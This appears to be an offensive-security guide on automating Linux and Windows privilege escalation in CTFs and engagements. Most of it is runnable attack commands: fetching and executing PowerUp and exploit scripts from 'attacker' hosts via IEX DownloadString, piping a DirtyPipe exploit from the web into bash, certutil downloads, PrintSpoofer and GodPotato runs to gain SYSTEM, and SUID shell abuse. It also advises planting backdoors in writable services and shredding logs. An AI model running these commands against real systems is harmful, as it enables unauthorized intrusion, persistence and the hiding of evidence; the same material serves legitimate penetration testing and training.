Automation Toolkit
Privilege Escalation Automation Toolkit — Root Faster, Think Smarter
Manual privilege escalation is an art — but in CTFs and engagements, speed and coverage matter most. This guide gives you a complete automated toolkit for Linux and Windows privilege escalation: scanners, scripts, payloads, and workflows that cut hours of manual digging into minutes.
I. 🧩 Core Concepts
Enumeration First
Always gather system data before trying exploits.
Automation Over Manual
Tools reveal what human oversight misses.
Persistence Awareness
Exploit once, persist forever.
Chaining
Combine multiple privilege vectors automatically.
II. 🧠 Linux PrivEsc Automation Suite
🧩 1. LinPEAS — The Gold Standard
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee linpeas.logPurpose:
Scans for SUID, cronjobs, misconfigurations, kernel vulns
Finds creds in memory, config, envs
Output highlights:
Possible Sudo MisconfigurationsInteresting Files with Write PermissionsExploitable Binaries
⚙️ 2. LES — Linux Exploit Suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.shFinds kernel exploits for local privilege escalation (CVE-based).
💣 3. LinEnum — Lightweight & Fast
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh -tFocus: quick recon of users, cronjobs, SUIDs, and writable configs.
🧠 4. PSPY — Process Spy
./pspy64Watches background cronjobs, processes, and scripts that may trigger with elevated privileges.
🧩 5. SUID Binary Exploitation Helper
find / -type f -perm -4000 2>/dev/nullAutomate GTFOBins lookup:
for bin in $(find / -type f -perm -4000 2>/dev/null); do
echo "[+] Checking $bin"; grep $(basename $bin) gtfobins.txt
done🧠 6. Sudo Privilege Analyzer
sudo -lAutomate with:
sudo -l | tee sudo_enum.txt
grep "NOPASSWD" sudo_enum.txt💀 7. Enumeration All-in-One Script
#!/bin/bash
echo "[*] Gathering PrivEsc data..."
whoami
id
hostname
uname -a
cat /etc/issue
echo "[*] SUID binaries:"
find / -perm -4000 -type f 2>/dev/null
echo "[*] Cron jobs:"
cat /etc/crontab
echo "[*] Checking sudo permissions:"
sudo -l
echo "[*] Kernel Exploits:"
uname -r | ./linux-exploit-suggester.shIII. 🧰 Windows PrivEsc Automation Suite
🧩 1. WinPEAS — Windows PrivEsc Powerhouse
.\winPEASx64.exe > output.txtFinds:
Service misconfigurations
UAC bypass vectors
AlwaysInstallElevated
Token privileges
💣 2. PowerUp.ps1
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.2/PowerUp.ps1')
Invoke-AllChecksDetects:
Weak service permissions
DLL hijacking
Insecure registry keys
🧠 3. Seatbelt
Seatbelt.exe -group=systemCollects system configuration, service permissions, and security settings for escalation.
⚙️ 4. SharpUp
SharpUp.exeC# version of PowerUp — stealthier and AV-safe.
💀 5. Windows Exploit Suggester (NG)
python3 windows-exploit-suggester.py --update
python3 windows-exploit-suggester.py --database 2024-10-01-mssb.xls --systeminfo sysinfo.txtAutomated local kernel exploit recommendation based on systeminfo.
🧩 6. PrintSpoofer & GodPotato
PrintSpoofer64.exe -i -c cmd.exe
GodPotato.exe -cmd "powershell.exe"Exploits SeImpersonatePrivilege → SYSTEM.
⚙️ 7. Automated PrivEsc PowerShell Script
Write-Output "[*] Enumerating..."
whoami
whoami /priv
systeminfo | findstr "OS Version"
Get-Service | where {$_.StartName -like "*LocalSystem*"}
Get-ScheduledTask | where {$_.Principal.RunLevel -eq "Highest"}IV. 🧠 Cross-Platform Enumeration Frameworks
PEASS-ng (linpeas/winpeas)
Linux/Windows
Comprehensive automated PrivEsc
LES / WinExploitSuggester
Linux/Windows
Kernel & patch vulnerability mapper
LinEnum / PowerUp
Linux/Windows
Lightweight script-based checks
pspy / ProcMon
Linux/Windows
Process and job monitoring
SharpUp / Seatbelt
Windows
Stealth enumeration (C# binaries)
V. ⚙️ Automation Pipelines
🧠 1. Fully Automated Linux Enumeration
chmod +x linpeas.sh LinEnum.sh
./linpeas.sh -a > peas.log
./LinEnum.sh -t > linenum.log
cat peas.log linenum.log > combined.txt
grep -E "SUID|sudo|cron|password|writable" combined.txt🧠 2. Windows Chained Recon
Start-Process winPEASx64.exe
IEX(New-Object Net.WebClient).DownloadString('http://attacker/PowerUp.ps1');Invoke-AllChecks
Seatbelt.exe -group=systemVI. ⚔️ Automated Exploit Execution
🧩 Linux Example: DirtyPipe Auto-Exploit
bash <(curl -s https://raw.githubusercontent.com/Almorabea/dirtypipez-exploit/main/dirtypipez.sh)💣 Windows Example: Kernel Exploit Chain
windows-exploit-suggester.py --database db.xls --systeminfo sysinfo.txt
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://attacker/Exploit.ps1')VII. 🧠 Integration with Metasploit & Empire
⚙️ Metasploit AutoEnum
use post/multi/recon/local_exploit_suggester
set SESSION 1
run⚙️ Empire
usemodule privesc/powerup/allchecks
usemodule situational_awareness/network/powerview/get_groupVIII. 🧩 Real-World Workflow Example
# 1. After reverse shell
whoami && uname -a
# 2. Deploy LinPEAS
wget http://10.10.14.2/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh | tee /tmp/report.txt
# 3. Review results
grep "Possible" /tmp/report.txt
# 4. Exploit SUID binary
/bin/bash -pWindows:
certutil -urlcache -split -f "http://10.10.14.2/winPEAS.exe"
.\winPEAS.exeIX. 🧠 Pro Tips & Red Team Tricks
✅ Speed vs. Noise
Run LinPEAS in “light” mode for faster enumeration.
Avoid running multiple scanners simultaneously on production — can trigger AV.
✅ Chaining Tools
Combine
LinPEAS+LESfor full Linux coverage.Combine
WinPEAS+PowerUpfor complete Windows mapping.
✅ Persistence Awareness
Always note writable services or tasks for backdoor planting.
✅ Log Hygiene
Delete enumeration outputs after review:
shred -u linpeas.log
✅ Pivot Integration
Run scanners through proxychains or tunnels for internal host enumeration.
X. 🧩 Quick Reference Table
Linux
LinPEAS
./linpeas.sh
Deep PrivEsc scan
Linux
LES
./linux-exploit-suggester.sh
Kernel exploit suggester
Linux
LinEnum
./LinEnum.sh
Fast manual recon
Windows
WinPEAS
winpeas.exe
PrivEsc + config scan
Windows
PowerUp
Invoke-AllChecks
Misconfig detection
Windows
PrintSpoofer
PrintSpoofer.exe -i -c cmd.exe
Token impersonation
Windows
Seatbelt
Seatbelt.exe -group=system
Security recon
Cross
PEASS-ng
linpeas/winpeas
Unified scanner
Last updated
Was this helpful?